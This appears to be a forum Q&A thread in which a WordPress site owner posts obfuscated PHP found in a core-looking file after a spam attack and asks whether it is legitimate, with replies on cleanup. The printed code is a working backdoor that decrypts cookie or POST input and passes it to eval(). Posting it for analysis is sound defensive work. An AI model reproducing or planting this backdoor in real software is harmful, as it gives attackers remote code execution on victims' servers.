# Malware uploaded on Server

Tags: php, linux, server, malware, virus

I am requesting assistance/ advice in context of a recent attack I had launched at my sites... this attack essentially is spamming my email accounts to a great deal I also have some suspicious files I am skeptical on which I would appreciate a second eye.I have removed the main spamming scripts successfully but would like to understand if this file wp-includes/Text/Diff/diff16.php   is native or foreign

Also because of the sheer amount of spam how do I clear my outgoing mail on Linux which has bogged down my server and took up so much space?

Below is the suspicious code on diff16.php

```
<?php $GLOBALS['h8d181c'] = "\x3e\x2d\x2f\x72\x40\x50\x2c\x21\x78\x42\x47\x60\x49\x52\x7d\x6d\x24\x34\x33\x3b\x54\x6e\x4f\x71\x5c\x35\x22\x6f\x20\x73\x26\x5e\x30\x6c\x37\x9\x43\x2b\x5b\x36\x27\x56\x7b\x6a\x3d\x70\x3a\x5d\x59\x44\x25\x4b\x55\x39\x66\x7a\x64\x51\x7e\x32\xa\x45\x5a\x58\x7c\x31\x57\x4d\x41\x68\x67\x69\x74\x77\x61\x29\x53\x38\x4a\x2a\x4c\x63\x65\x28\xd\x76\x79\x6b\x3f\x46\x2e\x48\x5f\x62\x4e\x23\x3c\x75";
$GLOBALS[$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][25]] = $GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][3];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]] = $GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][56];
$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][21];
$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]] = $GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][72];
$GLOBALS[$GLOBALS['h8d181c'][73].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][25]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][55].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][39]] = $GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][85].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][21];
$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][65]] = $GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][55].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][81]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][72];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][32]] = $GLOBALS['h8d181c'][86].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][59];
$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]] = $GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56];
$GLOBALS[$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][18]] = $_POST;
$GLOBALS[$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56]] = $_COOKIE;
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][70], NULL);
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][29], 0);
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][82], 0);
@$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][81]](0);

$rb00 = NULL;
$c174 = NULL;

$GLOBALS[$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][32];
global $e57c7;

function h114d($rb00, $n06f3)
{
    $t89f0c4 = "";

    for ($p89c=0; $p89c<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00);)
    {
        for ($b8a92b=0; $b8a92b<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($n06f3) && $p89c<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00); $b8a92b++, $p89c++)
        {
            $t89f0c4 .= $GLOBALS[$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][25]]($GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]]($rb00[$p89c]) ^ $GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]]($n06f3[$b8a92b]));
        }
    }

    return $t89f0c4;
}

function y26e2($rb00, $n06f3)
{
    global $e57c7;

    return $GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]]($GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]]($rb00, $e57c7), $n06f3);
}

foreach ($GLOBALS[$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56]] as $n06f3=>$g476b4c9)
{
    $rb00 = $g476b4c9;
    $c174 = $n06f3;
}

if (!$rb00)
{
    foreach ($GLOBALS[$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][18]] as $n06f3=>$g476b4c9)
    {
        $rb00 = $g476b4c9;
        $c174 = $n06f3;
    }
}

$rb00 = @$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][65]]($GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][32]]($GLOBALS[$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00), $c174));
if (isset($rb00[$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][87]]) && $e57c7==$rb00[$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][87]])
{
    if ($rb00[$GLOBALS['h8d181c'][74]] == $GLOBALS['h8d181c'][71])
    {
        $p89c = Array(
            $GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][85] => @$GLOBALS[$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][39]](),
            $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][85] => $GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][90].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][65],
        );
        echo @$GLOBALS[$GLOBALS['h8d181c'][73].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][25]]($p89c);
    }
    elseif ($rb00[$GLOBALS['h8d181c'][74]] == $GLOBALS['h8d181c'][82])
    {
        eval($rb00[$GLOBALS['h8d181c'][56]]);
    }
    exit();
}
```

Comment: I think the first port of call is not the actual code - but how did the hacker manager to get onto your server. i.e. prevent them doing this in the future.

Comment: This happened from a plugin that was sitting on a site that was not well took care of and completely hidden from main view/ my attention and consequently the attacker managed to go through a old theme and then work their way into a plugin. What i did to fix this was move to different server and delete all the other sites that are not well maintained

Comment: I have had the same code placed on one of my sites. What it tried to do on that site is to send spam emails. Reading the code is useless since it's encrypted and then obfuscated. I've given up trying. But +1 to you for asking the question at least.

Answer (score 1):

i'm still trying to find out how to prevent these files from appearing on my server, yet i'm able to remove them at least, here is a oneliner that might be of help:

```
find . -type f -name "*.php" -exec fgrep -m 1 -F "\$GLOBALS[\$GLOBALS[" {} \; -delete
```

it basically crawls the current directory (and subdirectories), searches for files with such code and removes them.
(perhaps you want to try it first without the -delete directive to ensure you're not removing any files that should be kept.)